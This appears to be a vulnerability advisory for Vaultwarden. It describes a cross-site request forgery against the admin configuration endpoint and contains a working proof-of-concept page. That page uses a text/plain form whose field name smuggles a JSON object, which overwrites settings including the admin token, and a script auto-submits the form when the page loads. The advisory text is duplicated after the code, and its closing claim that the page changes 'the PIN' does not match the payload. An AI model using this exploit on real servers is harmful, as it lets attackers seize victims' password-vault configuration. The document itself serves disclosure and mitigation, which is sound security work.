An attacker can create a malicious HTML page that sends an HTTP request to the Vaultwarden admin page to change its configuration.
The HTTP server does not verify the Content-Type header. This requires the DISABLE_ADMIN_TOKEN option to be enabled, as the authentication cookie will not be sent across site boundaries.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- PoC form for the cross-site request described in the text above.
     With enctype="text/plain" the browser sends the body as "<name>=<value>"
     without URL-encoding, so the JSON fragment placed in the name attribute
     (closed by the "}" in the value) reaches /admin/config as a plain-text POST.
     The report states the server accepts it without checking Content-Type.
     Server-side mitigations to look for: reject configuration updates whose
     Content-Type is not application/json, and/or require a per-session CSRF
     token; the cookie-based SameSite protection does not apply here because
     the PoC assumes DISABLE_ADMIN_TOKEN is set. -->
<form action="http://0.0.0.0:8083/admin/config" method="POST" enctype="text/plain">
<!-- The trailing `"test": "` in the name plus `a"}` in the value make the
     concatenated name=value string parse as a complete JSON object; every key
     in between (including admin_token) is a setting the request would
     overwrite. -->
<input type="text" name='{"sends_allowed":true,"disable_icon_download":false,"signups_allowed":true,"signups_verify":false,"invitations_allowed":true,"emergency_access_allowed":true,"email_change_allowed":true,"password_hints_allowed":true,"show_password_hint":false,"http_request_block_non_global_ips":true,"disable_2fa_remember":false,"authenticator_disable_time_drift":false,"require_device_email":false,"reload_templates":false,"increase_note_size_limit":false,"_enable_yubico":true,"_enable_duo":true,"_enable_smtp":true,"use_sendmail":false,"smtp_embed_images":true,"smtp_accept_invalid_certs":false,"smtp_accept_invalid_hostnames":false,"_enable_email_2fa":false,"email_2fa_enforce_on_verified_invite":false,"email_2fa_auto_fallback":false,"user_attachment_limit":null,"org_attachment_limit":null,"user_send_limit":null,"trash_auto_delete_days":null,"incomplete_2fa_time_limit":3,"signups_verify_resend_time":3600,"signups_verify_resend_limit":6,"password_iterations":600000,"icon_redirect_code":302,"icon_cache_ttl":2592000,"icon_cache_negttl":259200,"icon_download_timeout":10,"admin_session_lifetime":20,"smtp_port":587,"smtp_timeout":15,"email_token_size":6,"email_expiration_time":600,"email_attempts_limit":3,"domain":"http://localhost/","hibp_api_key":null,"signups_domains_whitelist":null,"org_creation_users":null,"admin_token":"TEST_ADMIN_TOKEN","invitation_org_name":"Vaultwarden","ip_header":"X-Real-IP","http_request_block_regex":null,"log_timestamp_format":"%Y-%m-%d %H:%M:%S.%3f","allowed_iframe_ancestors":null,"allowed_connect_src":null,"yubico_client_id":null,"yubico_secret_key":null,"yubico_server":null,"duo_ikey":null,"duo_skey":null,"duo_host":null,"sendmail_command":null,"smtp_host":null,"smtp_security":"starttls","smtp_from":null,"smtp_from_name":"Vaultwarden","smtp_username":null,"smtp_password":null,"smtp_auth_mechanism":null,"helo_name":null,"test": "' value='a"}'>
<input type="submit">
</form>
<script>
// Submits the form as soon as the page loads, so merely visiting the page
// triggers the request; no click on the submit button is needed.
document.forms[0].submit()
</script>
</body>
</html>
Summary
An attacker can create a malicious HTML page that sends an HTTP request to the Vaultwarden admin page to change its configuration.
The HTTP server does not verify the Content-Type header. This requires the DISABLE_ADMIN_TOKEN option to be enabled, as the authentication cookie will not be sent across site boundaries.
PoC
The following HTML code will change the PIN after the victim visits the page: